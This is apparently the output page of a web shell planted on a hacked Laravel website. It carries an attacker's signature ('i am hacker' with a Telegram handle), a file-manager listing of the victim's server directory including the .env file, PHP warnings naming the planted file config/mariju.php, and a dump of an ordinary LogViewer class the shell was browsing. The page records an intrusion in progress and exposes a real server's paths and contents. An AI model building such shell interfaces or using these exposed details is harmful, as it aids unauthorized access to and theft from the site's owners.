telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log18849014 KBJuly 18 2025 20:01:520644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
*/ class LogViewer implements LogViewerContract { /* ----------------------------------------------------------------- | Constants | ----------------------------------------------------------------- */ /** * LogViewer Version */ const VERSION = '10.1.1'; /* ----------------------------------------------------------------- | Properties | ----------------------------------------------------------------- */ /** * The factory instance. * * @var \Arcanedev\LogViewer\Contracts\Utilities\Factory */ protected $factory; /** * The filesystem instance. * * @var \Arcanedev\LogViewer\Contracts\Utilities\Filesystem */ protected $filesystem; /** * The log levels instance. * * @var \Arcanedev\LogViewer\Contracts\Utilities\LogLevels */ protected $levels; /* ----------------------------------------------------------------- | Constructor | ----------------------------------------------------------------- */ /** * Create a new instance. * * @param \Arcanedev\LogViewer\Contracts\Utilities\Factory $factory * @param \Arcanedev\LogViewer\Contracts\Utilities\Filesystem $filesystem * @param \Arcanedev\LogViewer\Contracts\Utilities\LogLevels $levels */ public function __construct( FactoryContract $factory, FilesystemContract $filesystem, LogLevelsContract $levels ) { $this->factory = $factory; $this->filesystem = $filesystem; $this->levels = $levels; } /* ----------------------------------------------------------------- | Getters & Setters | ----------------------------------------------------------------- */ /** * Get the log levels. * * @param bool $flip * * @return array */ public function levels($flip = false) { return $this->levels->lists($flip); } /** * Get the translated log levels. * * @param string|null $locale * * @return array */ public function levelsNames($locale = null) { return $this->levels->names($locale); } /** * Set the log storage path. * * @param string $path * * @return self */ public function setPath($path) { $this->factory->setPath($path); return $this; } /** * Get the log pattern. * * @return string */ public function getPattern() { return $this->factory->getPattern(); } /** * Set the log pattern. * * @param string $date * @param string $prefix * @param string $extension * * @return self */ public function setPattern( $prefix = FilesystemContract::PATTERN_PREFIX, $date = FilesystemContract::PATTERN_DATE, $extension = FilesystemContract::PATTERN_EXTENSION ) { $this->factory->setPattern($prefix, $date, $extension); return $this; } /* ----------------------------------------------------------------- | Main Methods | ----------------------------------------------------------------- */ /** * Get all logs. * * @return \Arcanedev\LogViewer\Entities\LogCollection */ public function all() { return $this->factory->all(); } /** * Paginate all logs. * * @param int $perPage * * @return \Illuminate\Pagination\LengthAwarePaginator */ public function paginate($perPage = 30) { return $this->factory->paginate($perPage); } /** * Get a log. * * @param string $date * * @return \Arcanedev\LogViewer\Entities\Log */ public function get($date) { return $this->factory->log($date); } /** * Get the log entries. * * @param string $date * @param string $level * * @return \Arcanedev\LogViewer\Entities\LogEntryCollection */ public function entries($date, $level = 'all') { return $this->factory->entries($date, $level); } /** * Download a log file. * * @param string $date * @param string|null $filename * @param array $headers * * @return \Symfony\Component\HttpFoundation\BinaryFileResponse */ public function download($date, $filename = null, $headers = []) { if (is_null($filename)) { $filename = sprintf( "%s{$date}.%s", config('log-viewer.download.prefix', 'laravel-'), config('log-viewer.download.extension', 'log') ); } $path = $this->filesystem->path($date); return response()->download($path, $filename, $headers); } /** * Get logs statistics. * * @return array */ public function stats() { return $this->factory->stats(); } /** * Get logs statistics table. * * @param string|null $locale * * @return \Arcanedev\LogViewer\Tables\StatsTable */ public function statsTable($locale = null) { return $this->factory->statsTable($locale); } /** * Delete the log. * * @param string $date * * @return bool */ public function delete($date) { return $this->filesystem->delete($date); } /** * Clear the log files. * * @return bool */ public function clear() { return $this->filesystem->clear(); } /** * Get all valid log files. * * @return array */ public function files() { return $this->filesystem->logs(); } /** * List the log files (only dates). * * @return array */ public function dates() { return $this->factory->dates(); } /** * Get logs count. * * @return int */ public function count() { return $this->factory->count(); } /** * Get entries total from all logs. * * @param string $level * * @return int */ public function total($level = 'all') { return $this->factory->total($level); } /** * Get logs tree. * * @param bool $trans * * @return array */ public function tree($trans = false) { return $this->factory->tree($trans); } /** * Get logs menu. * * @param bool $trans * * @return array */ public function menu($trans = true) { return $this->factory->menu($trans); } /* ----------------------------------------------------------------- | Check Methods | ----------------------------------------------------------------- */ /** * Determine if the log folder is empty or not. * * @return bool */ public function isEmpty() { return $this->factory->isEmpty(); } /* ----------------------------------------------------------------- | Other Methods | ----------------------------------------------------------------- */ /** * Get the LogViewer version. * * @return string */ public function version() { return self::VERSION; } }